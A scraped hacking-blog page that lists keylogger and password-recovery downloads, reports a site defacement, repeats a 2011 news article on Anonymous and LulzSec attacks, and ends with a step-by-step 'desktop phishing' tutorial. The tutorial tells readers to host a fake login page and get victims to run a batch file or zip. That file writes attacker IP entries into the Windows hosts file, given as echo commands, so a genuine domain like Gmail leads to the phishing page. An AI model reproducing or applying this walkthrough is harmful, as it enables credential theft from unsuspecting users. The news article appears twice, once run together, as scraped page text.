7/3/23

1000 Hacking Tutorial

password Recovery Softwares


PassWord RecoverY SoftwarE

PC Data Manager - Keylogger Software
Download Demo
PC Data Manager - Advance Keylogger Software
Download Demo

USB Data Theft Protection Tool
Download Demo

Barcode Label Maker - Standard
Download Demo
Barcode Label Maker - Professional
Download Demo

MSSQL to MySQL Database Converter
Download Demo
MySQL to MSSQL Database Converter
Download Demo
MS Access to MySQL Database Converter
Download Demo
MySQL to MS Excel Database Converter
Download Demo
MS Excel to MySQL Database Converter
Download Demo
MySQL to Oracle Database Converter
Download Demo
Oracle to MySQL Database Converter
Download Demo

Pocket PC forensic software
Download Demo

Live Chat Software
Download Demo
Internet Explorer Password Recovery and Password Unmask
Download Demo
Outlook and Outlook Express Password Recovery Software
Download Demo
MSN Explorer Password Recovery Software
Download Demo
Yahoo Messenger Archive Recovery Software
Download Demo

001Micron (Premium) - Data Recovery Software
Download Demo
DDR Recovery Professional
Download Demo
NTFS data recovery software
Download Demo
FAT data recovery software
Download Demo
Digital camera data recovery software
Download Demo
Digital pictures recovery software
Download Demo
Memory card data recovery software
Download Demo
Removable media data recovery software
Download Demo
Pen drive data recovery software
Download Demo
Sim card data recovery software
Download Demo
iPod data recovery software
Download Demo

Bulk SMS Software – Professional
Download Demo
Bulk SMS Software for GSM Mobile Phones
Download Demo
Bulk SMS Software for Windows based mobile phones
Download Demo
Pocket PC to Mobile Bulk SMS Software
Download Demo

CSLSecurity Hacked by TeaMp0isoN



CSLSe

CSL Security hacked by TeaMp0isoN. CSL Security claim to be "New LulzSec" type hacking Group. Their goal is to show that most of the important websites are vulnerable,They claim to show that any system can be compromised, nothing is secure. They Hit Sites, generally hack the Govt sites.
Hacked site : http://www.cslsecurity.com/
Mirror of hack : http://zone-h.org/mirror/id/14799769

Hacker group to attack M'sian Govt portal (update) By Arvind PETALING JAYA: A hacker group has threatened to attack thewww.malaysia.gov.my website. The group, which calls itself Anonymous, said it will launch the attack at 7.30pm GMT on Wednesday (3.30am Thursday Malaysian time) and has named it “Operation Malaysia.” It posted the threat in a graphic on this website,http://i.imgur.com/PTFWh.png. Mikko Hypponen, chief research officer at the F-Secure Corporation - a computer security software company based in Helsinki, Finland - tweeted about the threat at 4.42am Malaysian time. No other details were available at this time. It is also not known why Anonymous has targeted the Malaysian website. Hacker group Anonymous threatens to attack Malaysian Government website. But there has been an uptick in “hacktivism” these past weeks, where hacker groups have targeted various organisations for political purposes. Hackers have attacked the International Monetary Fund and Sony PlayStation Network, as well as the networks of aeronautics companyLockheed Martin Corp and Citibank in North America, amongst others. Anonymous was blamed for the hack into the PlayStation network but a spokesman for the group has denied involvement, saying that its aims are political. Spain, however, has arrested three suspected members of the hacker group for that attack. Anonymous apparently comprises a vast number of hackers in various countries, who have been organised into cells that share common goals. They operate anonymously but in a co-ordinated fashion. Meanwhile the AP reported from New York that a group of hackers has gained access to the websites of the U.S. Senate and video game company Bethesda Softworks, the latest in a series of cyberattacks plaguing a broad range of online victims. The group, which calls itself Lulz Security, posted what it called a "small, just-for-kicks release of some internal data" from Senate.gov on its website on Monday. Likely referencing reports that the Pentagon is considering whether a cyberattack could be considered an act of war, the group also wrote "is this an act of war, gentlemen? Problem?" A representative from the office of the Senate sergeant-at-arms did not immediately return a phone message for comment Monday afternoon. File - In this May 15, 2011 file photo people wearing masks often used by a group that calls itself "Anonymous" take part in a rally in Madrid. Spanish police arrested three suspected computer hackers that allegedly belonged to a loose-knit international activist group that has attacked corporate and government websites around the world, authorities said Friday June 10, 2011. A National Police statement identified the three detainees as leaders of the Spanish section of a group that calls itself "Anonymous." - AP Bethesda acknowledged the intrusion in a blog post Monday, saying hackers may have gained access to users' names, email addresses and passwords. The company said no credit card data or other financial information were compromised. Josh Shaul, chief technology officer at database security software makerApplication Security Inc., said the data Lulz posted is "verifiable proof" that it was able to gain access to and take control of the Senate's website. "It's a very skilled group," he said. "They claimed it was easy." Lulz Security has also recently claimed responsibility for breaking into the websites of PBS, Sony Pictures, Nintendo and others. Meanwhile, it's unclear who was responsible for a recent cyberattack on the International Monetary Fund's computer system or the one on Citibank that stole about 200,000 credit card account numbers, customer names and email addresses. Shaul said the recent string of attacks take advantage of insecure systems. While companies are protecting the perimeter of their computer systems, once hackers get in, "everything is there to own," he said. It's the equivalent of a bank putting a guard at the door and leaving all the money in a pile instead of in safes and vaults, he added. "We've created this situation where it's so easy for a skilled attacker to break in and get data," Shaul said. "They are doing it because they can." Bethesda declined to comment beyond its blog post and did not say how many users were affected. In Twitter messages, Lulz (Internet-speak for laughs) said it has had information on more than 200,000 users "for weeks" and broke into Bethesda's website more than two months ago. Bethesda, meanwhile, said that a hacker group "attempted an unlawful intrusion" over the weekend. Lulz said on its website Monday it is not releasing information it has on the 200,000-plus users. Bethesda, behind games such as "Brink" and "Fallout: New Vegas," is a subsidiary of ZeniMax Media Inc., based in Washington, D.C. Related story: Hackers break into U.S. Senate computers

Hacker group to attack M'sian Govt portal (update)
By Arvind




PETALING JAYA: A hacker group has threatened to attack thewww.malaysia.gov.my website.

The group, which calls itself Anonymous, said it will launch the attack at 7.30pm GMT on Wednesday (3.30am Thursday Malaysian time) and has named it “Operation Malaysia.”

It posted the threat in a graphic on this website,http://i.imgur.com/PTFWh.png.

Mikko Hypponen, chief research officer at the F-Secure Corporation - a computer security software company based in Helsinki, Finland - tweeted about the threat at 4.42am Malaysian time.

No other details were available at this time. It is also not known why Anonymous has targeted the Malaysian website.


Hacker group Anonymous threatens to attack Malaysian Government website.
But there has been an uptick in “hacktivism” these past weeks, where hacker groups have targeted various organisations for political purposes.

Hackers have attacked the International Monetary Fund and Sony PlayStation Network, as well as the networks of aeronautics companyLockheed Martin Corp and Citibank in North America, amongst others.

Anonymous was blamed for the hack into the PlayStation network but a spokesman for the group has denied involvement, saying that its aims are political. Spain, however, has arrested three suspected members of the hacker group for that attack.

Anonymous apparently comprises a vast number of hackers in various countries, who have been organised into cells that share common goals. They operate anonymously but in a co-ordinated fashion.

Meanwhile the AP reported from New York that a group of hackers has gained access to the websites of the U.S. Senate and video game company Bethesda Softworks, the latest in a series of cyberattacks plaguing a broad range of online victims.

The group, which calls itself Lulz Security, posted what it called a "small, just-for-kicks release of some internal data" from Senate.gov on its website on Monday.

Likely referencing reports that the Pentagon is considering whether a cyberattack could be considered an act of war, the group also wrote "is this an act of war, gentlemen? Problem?"

A representative from the office of the Senate sergeant-at-arms did not immediately return a phone message for comment Monday afternoon.


File - In this May 15, 2011 file photo people wearing masks often used by a group that calls itself "Anonymous" take part in a rally in Madrid. Spanish police arrested three suspected computer hackers that allegedly belonged to a loose-knit international activist group that has attacked corporate and government websites around the world, authorities said Friday June 10, 2011. A National Police statement identified the three detainees as leaders of the Spanish section of a group that calls itself "Anonymous." - AP
Bethesda acknowledged the intrusion in a blog post Monday, saying hackers may have gained access to users' names, email addresses and passwords. The company said no credit card data or other financial information were compromised.

Josh Shaul, chief technology officer at database security software makerApplication Security Inc., said the data Lulz posted is "verifiable proof" that it was able to gain access to and take control of the Senate's website.

"It's a very skilled group," he said. "They claimed it was easy."

Lulz Security has also recently claimed responsibility for breaking into the websites of PBS, Sony Pictures, Nintendo and others. Meanwhile, it's unclear who was responsible for a recent cyberattack on the International Monetary Fund's computer system or the one on Citibank that stole about 200,000 credit card account numbers, customer names and email addresses.

Shaul said the recent string of attacks take advantage of insecure systems. While companies are protecting the perimeter of their computer systems, once hackers get in, "everything is there to own," he said. It's the equivalent of a bank putting a guard at the door and leaving all the money in a pile instead of in safes and vaults, he added.

"We've created this situation where it's so easy for a skilled attacker to break in and get data," Shaul said. "They are doing it because they can."

Bethesda declined to comment beyond its blog post and did not say how many users were affected.

In Twitter messages, Lulz (Internet-speak for laughs) said it has had information on more than 200,000 users "for weeks" and broke into Bethesda's website more than two months ago. Bethesda, meanwhile, said that a hacker group "attempted an unlawful intrusion" over the weekend.

Lulz said on its website Monday it is not releasing information it has on the 200,000-plus users.

Bethesda, behind games such as "Brink" and "Fallout: New Vegas," is a subsidiary of ZeniMax Media Inc., based in Washington, D.C.

Related story: Hackers break into U.S. Senate computers

Desktop Phishing - Step by step tutorial



 It is an advance form of phishing. Kindly read my previous post on normal phishing herebefore proceeding.Difference between phishing and desktop phishing is as follows.

In phishing :-

1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.

2.Victim enters his credentials in fake login page that goes to attacker.
3.Victim is then redirected to an error page or genuine website depending on attacker.

But main drawback in phishing is that victim can easily differentiate between fake and real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing domain name.

In desktop phishing:-
1. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.
2. Victim types  the domain name of orignal/genuine website and is taken to our fake login page. But the domain name remains the same as typed by victim and victim doesn't come to know.
3. Rest of the things are same as in normal phishing.


What is Hosts File ?

The hosts file  is a text file containing domain names and IP address associated with them.
Location of hosts file in windows: C:\Windows\System32\drivers\etc\
Whenever we visit any website, say www.anything.com , an query is sent to  Domain Name Server(DNS) to  look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.

Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would
be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.

What is attack ?
I hope you have got an idea that how modification of this hosts file on victim's computer can be misused. We  need to modify victim's hosts file by adding the genuine domain name and IP address of our fake website /phishing page. Whenever victim would visit the genuine website , he would be directed to our fake login page and domain name in the URL box would remain genuine as typed by victim. Hence domain name is spoofed.

Two Steps to perform attack :-
1. Create and host phishing page on your computer.
2. Modify victim's host file

Step 1 -:

Since the webshosting sites like 110mb.com,ripway.com etc where we usually upload our phishing page do not provide a IP that points to your website like www.anything.110mb.com. An IP address points to a webserver and not a website. So we need to host the phishing page on our computer using a webserver software like wamp or xampp.
Kindly read my simple  tutorial on setting up XAMPP webserver here  and this step would be clear to you.

Step 2. This  step can performed in two different ways. 

Method 1 - Send victim a zip file containing modified host file . When Zip file would be clicked, It would automatically replace victim's orignal hosts file with modified hosts file.

Copy your hosts file and paste it anywhere . Modify it according to yourself..Edit it with any text editor and associate your public IP address with domain you wish as show.

Like in this case , when victim would visit gmail.com , he would be taken to website hosted on IP 'xxx.xxx.xxx.xxx'.Replace it with your public IP.Compress hosts file such that when victim opens it, it automatically gets copied to default location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.






Then you can bind this file with any exe ( using a binder or directly give it to victim. He is supposed to click it and you are done .

Method 2 - Create a batch file which would modify hosts file as per your need.
Open your notepad and type the following text

echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts
echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts 
Obviously replace it with your IP and website acc. to yourself.

Save file as 'all files' instead of txt files and name it anything.bat . Extension must be .bat 
When victim would run this file, a new entry will be made in hosts file.

You can test both the above methods to modify your own hosts file

Limitations of attack :-
1.Since our pubilc IP address is most probably dynamic that it gets changed everytime we disconnect and connect. To overcome this we need to purchase static IP from our ISP.
2. The browser may warn the victim that Digital Certificate of the website is not genuine.

Countermeasures:-
Never just blindly enter your credentials in a login page even if you yourself have typed a domain name in web browser. Check the protocol whether it is "http" or "https" . https is secure.
HaCkInG Is NoT A CrImE..iT's Our Passion..:P. Powered by Blogger.

Followers